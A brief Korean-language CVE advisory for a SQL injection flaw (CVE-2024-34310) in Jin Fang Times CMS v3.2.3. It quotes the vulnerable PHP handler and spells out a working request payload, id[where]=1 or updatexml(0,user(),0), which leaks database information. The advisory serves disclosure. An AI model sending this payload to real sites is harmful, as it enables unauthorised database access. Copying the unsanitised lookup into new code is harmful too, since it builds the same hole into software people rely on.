
CVE-2024-34310
CVE-2024-34310
[제안된 설명] Jin Fang Times 콘텐츠 관리 시스템 v3.2.3에서 id 파라미터를 통해 SQL 삽입 취약점이 존재하는 것으로 발견되었습니다.
[취약점 유형] SQL 삽입
[제품 공급업체] https://www.bjjfsd.com/
[영향을 받는 제품 코드 베이스] Jin Fang Times 콘텐츠 관리 시스템 - 3.2.3
[영향을 받는 구성 요소] public function data_show($id = 0) {
if (empty($id)) { $this->redirect('index'); }$info = M('News')->find($id);
[공격 유형] 원격
[영향 코드 실행] true
[영향 정보 공개] true
[공격 벡터] m=Wap&c=Index&a=data_show&id[where]=1%20or%20updatexml(0,user(),0)
[발견자] yishan
Use CVE-2024-34310.